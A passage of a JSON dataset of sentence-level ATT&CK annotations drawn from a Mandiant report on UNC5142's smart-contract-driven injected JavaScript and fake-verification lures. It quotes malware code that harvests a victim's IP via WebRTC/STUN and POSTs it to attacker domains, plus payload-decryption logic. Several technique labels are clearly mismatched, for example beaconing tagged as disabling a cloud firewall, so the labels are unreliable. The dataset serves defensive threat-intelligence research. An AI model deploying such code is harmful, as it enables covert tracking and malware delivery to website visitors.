"MalwareTool" }, { "text": "decodes", "start": 84, "end": 91, "label": "Action" }, { "text": "compressed", "start": 30, "end": 40, "label": "Action" }, { "text": "decompresses", "start": 112, "end": 124, "label": "Action" }, { "text": "get the clean interface data", "start": 145, "end": 173, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s71-fecd7c", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "The ABI data is returned in a compressed and base64 encoded format which the script decodes via atob()\nand then decompresses using pako.unzip to get the clean interface data.\n2)", "sentence_text": "Victim fingerprinting via the Second-Level contract:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s72-77f3ce", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "Victim fingerprinting via the Second-Level contract:", "sentence_text": "The injected JavaScript connects to the Second-Level Smart Contract (e.g., 0x8FBA1667BEF5EdA433928b220886A830488549BD ).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Connect to a smart contract to retrieve or exchange data.", "entities": [ { "text": "connects to the Second-Level Smart Contract", "start": 24, "end": 67, "label": "Action" }, { "text": "0x8FBA1667BEF5EdA433928b220886A830488549BD", "start": 75, "end": 117, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s73-ac60b2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "The injected JavaScript connects to the Second-Level Smart Contract (e.g., 0x8FBA1667BEF5EdA433928b220886A830488549BD ).", "sentence_text": "This contract acts as the logic of the attack, containing code to perform reconnaissance actions (Figure 5 and Figure 6).", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Perform reconnaissance actions via Second-Level Smart Contract logic", "entities": [ { "text": "code to perform reconnaissance actions ", "start": 58, "end": 97, "label": "MalwareTool" }, { "text": "contract ", "start": 5, "end": 14, "label": "Infrastructure_Indicator" }, { "text": "acts ", "start": 14, "end": 19, "label": "Action" }, { "text": " containing ", "start": 46, "end": 58, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s74-eeb914", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "This contract acts as the logic of the attack, containing code to perform reconnaissance actions (Figure 5 and Figure 6).", "sentence_text": "It makes a series of eth_call operations to execute specific functions within the contract to fingerprint the victim’s environment:\nteaCeremony (0x9f7a7126)\n, initially served as a method for dynamic code execution and page display.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Execute teaCeremony function via eth_call to fingerprint victim environment", "entities": [ { "text": "eth_call ", "start": 21, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "execute", "start": 44, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "contract ", "start": 82, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "fingerprint the victim’s environment", "start": 94, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "teaCeremony (0x9f7a7126)", "start": 132, "end": 156, "label": "Infrastructure_Indicator" }, { "text": " code execution", "start": 199, "end": 214, "label": "Action" }, { "text": "page display", "start": 219, "end": 231, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s75-15d8e6", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "It makes a series of eth_call operations to execute specific functions within the contract to fingerprint the victim’s environment:\nteaCeremony (0x9f7a7126)\n, initially served as a method for dynamic code execution and page display.", "sentence_text": "Later it was used for adding and removing POST check-ins.\nshibuyaCrossing (0x1ba79aa2)\n, responsible for identifying the victim's platform or operating system with additional OS/platform values added over time asakusaTemple (0xa76e7648)\n, initially a placeholder for console log display that later evolved into a beacon for tracking user interaction stages by sending user-agent values ginzaLuxury (0xa98b06d3)\n, responsible for retrieving the code for finding, fetching, decrypting, and ultimately displaying the malicious lure to the user The functionality for command and control (C2) check-ins has evolved within the contract:\nLate 2024:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1071.004", "name": "DNS" } ], "procedure": "Use shibuyaCrossing to identify OS, asakusaTemple for tracking, and ginzaLuxury to retrieve/decrypt/display lure", "entities": [ { "text": "victim's platform or operating system", "start": 121, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "asakusaTemple (0xa76e7648)", "start": 210, "end": 236, "label": "MalwareTool" }, { "text": "ginzaLuxury (0xa98b06d3)", "start": 386, "end": 410, "label": "MalwareTool" }, { "text": "shibuyaCrossing (0x1ba79aa2)", "start": 58, "end": 86, "label": "MalwareTool" }, { "text": " malicious lure ", "start": 513, "end": 529, "label": "MalwareTool" }, { "text": "identifying", "start": 105, "end": 116, "label": "Action" }, { "text": "tracking user interaction stages", "start": 324, "end": 356, "label": "Action" }, { "text": "sending user-agent values", "start": 360, "end": 385, "label": "Action" }, { "text": "retrieving the code", "start": 429, "end": 448, "label": "Action" }, { "text": " finding, fetching, decrypting", "start": 452, "end": 482, "label": "Action" }, { "text": "displaying", "start": 499, "end": 509, "label": "Action" }, { "text": " contract", "start": 620, "end": 629, "label": "Infrastructure_Indicator" }, { "text": "adding and removing POST check-ins", "start": 22, "end": 56, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s76-6507f0", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "Later it was used for adding and removing POST check-ins.\nshibuyaCrossing (0x1ba79aa2)\n, responsible for identifying the victim's platform or operating system with additional OS/platform values added over time asakusaTemple (0xa76e7648)\n, initially a placeholder for console log display that later evolved into a beacon for tracking user interaction stages by sending user-agent values ginzaLuxury (0xa98b06d3)\n, responsible for retrieving the code for finding, fetching, decrypting, and ultimately displaying the malicious lure to the user The functionality for command and control (C2) check-ins has evolved within the contract:\nLate 2024:", "sentence_text": "The script used a STUN server ( stun:stun.l.google.com:19302 ) to obtain the victim's public IP and sent it to a domain like saaadnesss[.]shop or lapkimeow[.]icu/check February 2025:", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Use STUN server to get victim IP and send to C2 domain", "entities": [ { "text": " STUN server", "start": 17, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "stun:stun.l.google.com:19302", "start": 32, "end": 60, "label": "Infrastructure_Indicator" }, { "text": " saaadnesss[.]shop", "start": 124, "end": 142, "label": "Infrastructure_Indicator" }, { "text": " lapkimeow[.]icu/check", "start": 145, "end": 167, "label": "Infrastructure_Indicator" }, { "text": "script", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": " sent", "start": 99, "end": 104, "label": "Action" }, { "text": " victim's public IP", "start": 76, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "obtain", "start": 66, "end": 72, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s77-18bd0c", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "The script used a STUN server ( stun:stun.l.google.com:19302 ) to obtain the victim's public IP and sent it to a domain like saaadnesss[.]shop or lapkimeow[.]icu/check February 2025:", "sentence_text": "The STUN-based POST check-in was removed and replaced with a cookie-based tracking mechanism ( data-ai-collecting ) within the teaCeremony ( 0x9f7a7126 ) function.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.007", "name": "Disable or Modify Cloud Firewall" } ], "procedure": "Replace STUN POST check-in with cookie-based tracking in teaCeremony function", "entities": [ { "text": "STUN-based POST check-in", "start": 4, "end": 28, "label": "Infrastructure_Indicator" }, { "text": " removed", "start": 32, "end": 40, "label": "Action" }, { "text": "replaced ", "start": 45, "end": 54, "label": "Action" }, { "text": "cookie-based tracking mechanism", "start": 61, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "data-ai-collecting", "start": 95, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "teaCeremony ( 0x9f7a7126 )", "start": 127, "end": 153, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s78-aeeb23", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "The STUN-based POST check-in was removed and replaced with a cookie-based tracking mechanism ( data-ai-collecting ) within the teaCeremony ( 0x9f7a7126 ) function.", "sentence_text": "April 2025:\nThe check-in mechanism was reintroduced and enhanced.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s79-2fd96e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "April 2025:\nThe check-in mechanism was reintroduced and enhanced.", "sentence_text": "The asakusaTemple ( 0xa76e7648 ) function was modified to send staged POST requests to the domain ratatui[.]today , beaconing at each phase of the lure interaction to track victim progression.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1562.007", "name": "Disable or Modify Cloud Firewall" } ], "procedure": "Send staged POST requests to ratatui[.]today to track victim progression", "entities": [ { "text": "asakusaTemple ( 0xa76e7648 )", "start": 4, "end": 32, "label": "Action" }, { "text": "modified", "start": 46, "end": 54, "label": "Action" }, { "text": " send", "start": 57, "end": 62, "label": "Action" }, { "text": " ratatui[.]today", "start": 97, "end": 113, "label": "Action" }, { "text": " beaconing", "start": 115, "end": 125, "label": "Action" }, { "text": "lure", "start": 147, "end": 151, "label": "Action" }, { "text": " track", "start": 166, "end": 172, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s80-cd4e3f", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "The asakusaTemple ( 0xa76e7648 ) function was modified to send staged POST requests to the domain ratatui[.]today , beaconing at each phase of the lure interaction to track victim progression.", "sentence_text": "//Example of code retrieved from the second-level smart contract (IP check and STUN)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s81-8a14b3", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "//Example of code retrieved from the second-level smart contract (IP check and STUN)", "sentence_text": "if (await new Promise(r => { let a = new RTCPeerConnection({ iceServers: [{ urls: \"stun:stun.l.google.com:19302\" }] });\na.createDataChannel(\"\");\na.onicecandidate = e => { let ip = e?.candidate?.candidate?.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)?.[0];\nif (ip) { fetch('https://saaadnesss[.]shop/check', { // Or lapkimeow[.]icu/check method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ ip, domain: location.hostname })\n}).then(r", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Use WebRTC STUN to get victim IP and POST to C2 domain", "entities": [ { "text": " urls: \"stun:stun.l.google.com:19302\" ", "start": 75, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "a.createDataChannel(\"\")", "start": 120, "end": 143, "label": "MalwareTool" }, { "text": "RTCPeerConnection", "start": 41, "end": 58, "label": "MalwareTool" }, { "text": "a.onicecandidate ", "start": 145, "end": 162, "label": "MalwareTool" }, { "text": "e?.candidate?.candidate?.", "start": 180, "end": 205, "label": "Action" }, { "text": "/\\d+\\.\\d+\\.\\d+\\.\\d+/)?.[0]", "start": 211, "end": 237, "label": "MalwareTool" }, { "text": "'https://saaadnesss[.]shop/check", "start": 255, "end": 287, "label": "Infrastructure_Indicator" }, { "text": "fetch", "start": 249, "end": 254, "label": "MalwareTool" }, { "text": " lapkimeow[.]icu/check", "start": 297, "end": 319, "label": "Infrastructure_Indicator" }, { "text": "(ip", "start": 242, "end": 245, "label": "Infrastructure_Indicator" }, { "text": " JSON.stringify", "start": 390, "end": 405, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s82-3d6c1c", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "if (await new Promise(r => { let a = new RTCPeerConnection({ iceServers: [{ urls: \"stun:stun.l.google.com:19302\" }] });\na.createDataChannel(\"\");\na.onicecandidate = e => { let ip = e?.candidate?.candidate?.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)?.[0];\nif (ip) { fetch('https://saaadnesss[.]shop/check', { // Or lapkimeow[.]icu/check method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ ip, domain: location.hostname })\n}).then(r", "sentence_text": "=> r.json()).then(data => r(data.status));", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Parse JSON response and check status from C2 server", "entities": [ { "text": "r.json", "start": 3, "end": 9, "label": "Action" }, { "text": ".then", "start": 12, "end": 17, "label": "Action" }, { "text": "status", "start": 33, "end": 39, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s83-f70aeb", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "=> r.json()).then(data => r(data.status));", "sentence_text": "a.onicecandidate = null;\n}\n};\na.createOffer().then(o => a.setLocalDescription(o));\n})", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Complete WebRTC connection setup for IP discovery", "entities": [ { "text": "a.onicecandidate", "start": 0, "end": 16, "label": "MalwareTool" }, { "text": " a.setLocalDescription(o)", "start": 55, "end": 80, "label": "MalwareTool" }, { "text": "a.createOffer()", "start": 30, "end": 45, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s84-597b12", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "a.onicecandidate = null;\n}\n};\na.createOffer().then(o => a.setLocalDescription(o));\n})", "sentence_text": "=== \"Decline\") { console.warn(\"Execution stopped: Declined by server\");\n} else { await teaCeremony(await orchid.methods.shibuyaCrossing().call(), 2);\nawait teaCeremony(await orchid.methods.akihabaraLights().call(), 3);", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Execute teaCeremony with shibuyaCrossing and akihabaraLights based on server response", "entities": [ { "text": "server", "start": 62, "end": 68, "label": "Infrastructure_Indicator" }, { "text": " console.warn", "start": 16, "end": 29, "label": "MalwareTool" }, { "text": "orchid.methods.shibuyaCrossing().call()", "start": 105, "end": 144, "label": "MalwareTool" }, { "text": "teaCeremony", "start": 87, "end": 98, "label": "MalwareTool" }, { "text": " teaCeremony(", "start": 155, "end": 168, "label": "MalwareTool" }, { "text": " orchid.methods.akihabaraLights().call()", "start": 173, "end": 213, "label": "MalwareTool" }, { "text": "(await", "start": 98, "end": 104, "label": "Action" }, { "text": "\"Execution stopped", "start": 30, "end": 48, "label": "Action" }, { "text": "await", "start": 150, "end": 155, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s85-1c4fd9", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "=== \"Decline\") { console.warn(\"Execution stopped: Declined by server\"); } else { await teaCeremony(await orchid.methods.shibuyaCrossing().call(), 2); await teaCeremony(await orchid.methods.akihabaraLights().call(), 3);", "sentence_text": "await teaCeremony(await orchid.methods.ginzaLuxury().call(), 4); await teaCeremony(await orchid.methods.asakusaTemple().call(), 5); }", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s86-692cc0", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "await teaCeremony(await orchid.methods.ginzaLuxury().call(), 4);\nawait teaCeremony(await orchid.methods.asakusaTemple().call(), 5);\n}", "sentence_text": "This final contract acts as a configuration storage container.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s87-bed73e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "This final contract acts as a configuration storage container.", "sentence_text": "The answer lies in the distinction between a smart contract's code and its data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s88-ae5d23", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "The answer lies in the distinction between a smart contract's code and its data.", "sentence_text": "Immutable code:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s89-971dda", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "Immutable code:", "sentence_text": "Once a smart contract is deployed, its program code is permanent and can never be altered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s90-f6cd9b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "Once a smart contract is deployed, its program code is permanent and can never be altered.", "sentence_text": "This is the part that provides trust and reliability.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s91-5eb5b3", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "This is the part that provides trust and reliability.", "sentence_text": "The permanent code of the contract can include functions specifically designed to change this stored data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s92-3868d2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "The permanent code of the contract can include functions specifically designed to change this stored data.", "sentence_text": "UNC5142 exploits this by having their smart contracts built with special administrative functions.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1601.001", "name": "Patch System Image" } ], "procedure": "Build smart contracts with special administrative functions", "entities": [ { "text": "UNC5142", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": " exploits", "start": 7, "end": 16, "label": "MalwareTool" }, { "text": "smart contracts ", "start": 38, "end": 54, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s93-de55c4", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "UNC5142 exploits this by having their smart contracts built with special administrative functions.", "sentence_text": "The contract's program remains untouched, but its configuration is now completely different.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s94-a2810d", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "The contract's program remains untouched, but its configuration is now completely different.", "sentence_text": "This is how they achieve agility while operating on an immutable ledger.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s95-75b39b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "This is how they achieve agility while operating on an immutable ledger.", "sentence_text": "After the one-time cost of deploying the smart contracts, the initial funding for an operator wallet is sufficient to cover several hundred such updates.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s96-e53177", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "After the one-time cost of deploying the smart contracts, the initial funding for an operator wallet is sufficient to cover several hundred such updates.", "sentence_text": "Not only does this reduce the effectiveness of some detection efforts, it also increases the difficulty of analysis of the payload by security researchers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s97-1feb72", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "Not only does this reduce the effectiveness of some detection efforts, it also increases the difficulty of analysis of the payload by security researchers.", "sentence_text": "The encrypted CLEARSHORT landing page is typically hosted on a Cloudflare .dev page.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.006", "name": "Web Services" } ], "procedure": "Host CLEARSHORT landing page on Cloudflare .dev page", "entities": [ { "text": "Cloudflare .dev", "start": 63, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "CLEARSHORT landing page", "start": 14, "end": 37, "label": "MalwareTool" }, { "text": "hosted", "start": 51, "end": 57, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s98-764667", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "The encrypted CLEARSHORT landing page is typically hosted on a Cloudflare .dev page.", "sentence_text": "The function that decrypts the AES-encrypted landing page uses an initialization vector retrieved from the third smart contract (Figure 9 and Figure 10).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Retrieve initialization vector from third smart contract to decrypt landing page", "entities": [ { "text": " uses", "start": 57, "end": 62, "label": "Action" }, { "text": "retrieved", "start": 88, "end": 97, "label": "Action" }, { "text": "The function that decrypts the AES-encrypted landing page", "start": 0, "end": 57, "label": "MalwareTool" }, { "text": " third smart contract", "start": 106, "end": 127, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s99-94240f", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "The function that decrypts the AES-encrypted landing page uses an initialization vector retrieved from the third smart contract (Figure 9 and Figure 10).", "sentence_text": "The decryption is performed client-side within the victim's browser.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.011", "name": "Fileless Storage" } ], "procedure": "Perform decryption client-side in victim's browser", "entities": [ { "text": "decryption", "start": 4, "end": 14, "label": "Action" }, { "text": " performed ", "start": 17, "end": 28, "label": "Action" }, { "text": "victim's browser", "start": 51, "end": 67, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s100-15630a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "The decryption is performed client-side within the victim's browser.", "sentence_text": "// Simplified example of the decryption logic async function decryptScrollToText(encryptedBase64, keyBase64) { const key = Uint8Array.from(atob(keyBase64), c => c.charCodeAt(0));\nconst combinedData = Uint8Array.from(atob(encryptedBase64), c => c.charCodeAt(0));\nconst iv = combinedData.slice(0, 12); // IV is the first 12 bytes const encryptedData = combinedData.slice(12);\nconst cryptoKey = await crypto.subtle.importKey( \"raw\", key, \"AES-GCM\", false, [\"decrypt\"]\n);\nconst decryptedArrayBuffer = await crypto.subtle.decrypt( { name: \"AES-GCM\", iv }, cryptoKey, encryptedData );\nreturn new TextDecoder().decode(decryptedArrayBuffer);\n}\n// ...", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.011", "name": "Fileless Storage" } ], "procedure": "Decrypt AES-GCM encrypted payload using Web Crypto API", "entities": [ { "text": "TextDecoder()", "start": 590, "end": 603, "label": "MalwareTool" }, { "text": "atob", "start": 216, "end": 220, "label": "MalwareTool" }, { "text": "crypto.subtle.decrypt", "start": 503, "end": 524, "label": "MalwareTool" }, { "text": "crypto.subtle.importKey", "start": 398, "end": 421, "label": "MalwareTool" }, { "text": " await ", "start": 391, "end": 398, "label": "Action" }, { "text": "await", "start": 497, "end": 502, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s101-f7d09e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "// Simplified example of the decryption logic async function decryptScrollToText(encryptedBase64, keyBase64) { const key = Uint8Array.from(atob(keyBase64), c => c.charCodeAt(0));\nconst combinedData = Uint8Array.from(atob(encryptedBase64), c => c.charCodeAt(0));\nconst iv = combinedData.slice(0, 12); // IV is the first 12 bytes const encryptedData = combinedData.slice(12);\nconst cryptoKey = await crypto.subtle.importKey( \"raw\", key, \"AES-GCM\", false, [\"decrypt\"]\n);\nconst decryptedArrayBuffer = await crypto.subtle.decrypt( { name: \"AES-GCM\", iv }, cryptoKey, encryptedData );\nreturn new TextDecoder().decode(decryptedArrayBuffer);\n}\n// ...", "sentence_text": "(Code to fetch encrypted HTML and key from the third-level contract)", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.001", "name": "Binary Padding" } ], "procedure": "Fetch encrypted HTML and key from third-level contract", "entities": [ { "text": "encrypted HTML", "start": 15, "end": 29, "label": "MalwareTool" }, { "text": " key", "start": 33, "end": 37, "label": "MalwareTool" }, { "text": "third-level contract", "start": 47, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "fetch ", "start": 9, "end": 15, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s102-6ca713", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "(Code to fetch encrypted HTML and key from the third-level contract)", "sentence_text": "...\nif (cherryBlossomHTML) { // cherryBlossomHTML contains the encrypted landing page try { let sakuraKey = await JadeContract.methods.pearlTower().call(); // Get the AES key const decryptedHTML = await decryptScrollToText(cherryBlossomHTML, sakuraKey);\n// ...", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.001", "name": "Binary Padding" } ], "procedure": "Retrieve AES key via pearlTower() and decrypt landing page HTML", "entities": [ { "text": "cherryBlossomHTML", "start": 8, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "JadeContract.methods.pearlTower().call()", "start": 114, "end": 154, "label": "MalwareTool" }, { "text": " decryptScrollToText", "start": 202, "end": 222, "label": "MalwareTool" }, { "text": " await", "start": 107, "end": 113, "label": "Action" }, { "text": "await", "start": 197, "end": 202, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s103-f7ecf6", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "...\nif (cherryBlossomHTML) { // cherryBlossomHTML contains the encrypted landing page try { let sakuraKey = await JadeContract.methods.pearlTower().call(); // Get the AES key const decryptedHTML = await decryptScrollToText(cherryBlossomHTML, sakuraKey);\n// ...", "sentence_text": "(Display the decrypted HTML in an iframe) ...\n} catch (error) { return;\n}\n}\nCLEARSHORT Templates and Lures UNC5142 has used a variety of lures for their landing page, evolving them over time:\nJanuary 2025:", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Display decrypted HTML in iframe", "entities": [ { "text": "CLEARSHORT Templates and Lures", "start": 76, "end": 106, "label": "MalwareTool" }, { "text": "UNC5142", "start": 107, "end": 114, "label": "ThreatActor" }, { "text": "lures ", "start": 137, "end": 143, "label": "MalwareTool" }, { "text": "used ", "start": 119, "end": 124, "label": "Action" }, { "text": "decrypted HTML ", "start": 13, "end": 28, "label": "MalwareTool" }, { "text": "Display ", "start": 1, "end": 9, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s104-01d702", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "(Display the decrypted HTML in an iframe) ...\n} catch (error) { return;\n}\n}\nCLEARSHORT Templates and Lures UNC5142 has used a variety of lures for their landing page, evolving them over time:\nJanuary 2025:", "sentence_text": "Lures included fake Data Privacy agreements and reCAPTCHA turnstiles (Figure 11 and Figure 12).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Use fake Data Privacy agreements and reCAPTCHA turnstiles as lures", "entities": [ { "text": "Lures", "start": 0, "end": 5, "label": "MalwareTool" }, { "text": " included ", "start": 5, "end": 15, "label": "Action" }, { "text": "fake Data Privacy agreements", "start": 15, "end": 43, "label": "MalwareTool" }, { "text": "reCAPTCHA turnstiles", "start": 48, "end": 68, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s105-7348b8", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "Lures included fake Data Privacy agreements and reCAPTCHA turnstiles (Figure 11 and Figure 12).", "sentence_text": "March 2025:\nThe threat cluster began using a lure that mimics a Cloudflare IP web error (Figure 13).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s106-bb0aef", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "March 2025:\nThe threat cluster began using a lure that mimics a Cloudflare IP web error (Figure 13).", "sentence_text": "May 2025:\nAn \"Anti-Bot Lure\" was observed, presenting another variation of a fake verification step (Figure 14).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s107-1399fe", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 107, 